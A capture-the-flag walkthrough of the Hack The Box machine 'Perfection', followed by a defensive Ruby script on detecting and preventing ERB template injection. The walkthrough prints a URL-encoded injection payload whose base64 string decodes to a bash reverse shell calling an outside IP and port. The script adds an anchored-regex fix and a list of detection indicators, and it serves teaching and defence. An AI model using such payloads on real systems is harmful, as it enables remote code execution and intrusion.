🧗 Perfection
https://app.hackthebox.com/machines/Perfection
After the enumeration we find a webpage where we can submit some data, so let's try to input a reverse shell:
It did not work, so after looking around for a bit:
I saw that the WEBrick framework was vulnerable to URL encoding.
So on CyberChef I encoded the reverse shell:
Set up a listener with the right LHOST and port:
Submitting it in the form did not work, so I fired up Burp.
The payload needed to be encoded in base64 and then URL-encoded, and looks like this:
And the final payload:
So the request looks like:
%0A: This represents a newline character (line feed). It is used to break the line and start a new line in the code.

<%25%3dsystem("echo+YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC42Mi83MzczIDA%2BJjE%3D|+base64+-d+|+bash");%25>: This part of the payload is URL-encoded. After decoding, it becomes:

<%=system("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42Mi83MzczIDA+JjE=| base64 -d | bash");%>

This code snippet uses the server-side scripting tag <% %> (commonly used in languages like PHP or ASP) to execute a system command. The system command being executed is:

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42Mi83MzczIDA+JjE=| base64 -d | bash

Breaking it down further:

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42Mi83MzczIDA+JjE=: This part echoes a base64-encoded string.
| base64 -d: This pipes the echoed string to the base64 command with the -d option, which decodes the base64-encoded string.
| bash: Finally, the decoded string is piped to the bash shell for execution.
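As an added, defender-side illustration (this is not code from the writeup or from the Perfection box itself): the explanation above hinges on two things, the encoded newline getting through the form's input check and the ERB tag being rendered by the Ruby application. The script below decodes a form value the way a Ruby web stack does, shows why a line-anchored allowlist regex (^...$, used here as an assumption for illustration; the writeup does not say what the application's own check looked like) accepts a value with an embedded newline while a string-anchored one (\A...\z) rejects it, lists the indicators a log or WAF rule can key on, and renders user input as escaped data instead of as template source. SAMPLE_RAW is a constructed value in the same shape as the request in the writeup, with a harmless command in place of the reverse shell.

```ruby
require 'erb'
require 'uri'

# Decode a form field the way a Ruby web stack does for
# application/x-www-form-urlencoded bodies: '+' becomes a space and %XX
# sequences are decoded, so %0A turns into a real newline.
def decode_form_value(raw)
  URI.decode_www_form_component(raw)
end

# Constructed sample modelled on the writeup's request (not the page's own
# payload): a harmless-looking value, an encoded newline, then an ERB tag.
SAMPLE_RAW = 'math%0A%3C%25%3D+system(%22id%22)+%25%3E'

# Illustrative allowlist in the style a form might use (an assumption, not the
# box's real check). In Ruby, ^ and $ are LINE anchors, so a multi-line value
# passes as soon as one of its lines is clean.
NAIVE_ALLOWLIST = /^[a-zA-Z0-9\s]+$/

def naive_valid?(value)
  !(value =~ NAIVE_ALLOWLIST).nil?
end

# Hardened allowlist: \A and \z anchor to the whole string and only a plain
# space is permitted, so a value containing a newline is rejected outright.
STRICT_ALLOWLIST = /\A[a-zA-Z0-9 ]+\z/

def strict_valid?(value)
  !(value =~ STRICT_ALLOWLIST).nil?
end

# Indicators a reviewer or a WAF/log rule would look for in the decoded value.
# Returned in a fixed order so the result is easy to log and to assert on.
def template_injection_indicators(value)
  indicators = []
  indicators << :newline     if value.include?("\n")
  indicators << :erb_tag     if value.include?('<%')
  indicators << :system_call if value.match?(/\bsystem\s*\(/)
  indicators << :base64_pipe if value.match?(/base64\s+-d\b/)
  indicators
end

# Safe rendering: user input is handed to the template as data and
# HTML-escaped; it is never concatenated into the template source.
SAFE_TEMPLATE = ERB.new('<p>Category: <%= ERB::Util.html_escape(category) %></p>')

def render_safely(category)
  SAFE_TEMPLATE.result_with_hash(category: category)
end

if __FILE__ == $PROGRAM_NAME
  decoded = decode_form_value(SAMPLE_RAW)
  puts "decoded value : #{decoded.inspect}"
  puts "naive check   : #{naive_valid?(decoded)}"   # true  (bypassed by the newline)
  puts "strict check  : #{strict_valid?(decoded)}"  # false (rejected)
  puts "indicators    : #{template_injection_indicators(decoded).inspect}"
  puts render_safely(decoded)
end
```

Run it with plain ruby; the naive check reports true for the multi-line value and the strict check reports false, and the rendered HTML shows the tag characters escaped rather than executed. The indicator list is the part worth wiring into request logging: a newline or a <% sequence inside a single-line form field is unusual enough to alert on by itself.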